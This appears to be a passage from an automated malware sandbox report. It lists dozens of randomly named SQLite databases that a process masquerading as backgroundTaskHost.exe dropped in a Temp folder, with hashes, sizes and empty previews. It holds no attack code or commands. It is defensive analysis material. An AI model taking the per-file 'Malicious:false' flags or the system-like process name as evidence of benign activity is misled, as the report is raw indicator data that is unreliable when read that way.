                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\dhnw7ufxe3

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\e7Z2AhRaWb

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\eAdXHR38sG

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\eNoZ1QvvGi

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\ePknmNLqeo

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\ef7sCdOibG

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\fCg31sVkN8

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\fVvbcYRG6B

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\fv1yqgGumE

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\gAhUDDZwvk

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\gBbi8NHyUb

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\gJsdKQIPIW

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\gOqp7rJVPV

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\gXF74ZN1BZ

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\gcpmy6KKUg

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\hA9AmsWX7E

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\hBXpIC5HNG

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\iBxz4EnTVR

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\iPMiLgF9of

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\iWAYJyAwNW

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\ihU9mDg5RU

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\j2Ngwlzq4V

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):98304
                                                                                          Entropy (8bit):0.08235737944063153
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\j5v3m4k6JC

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
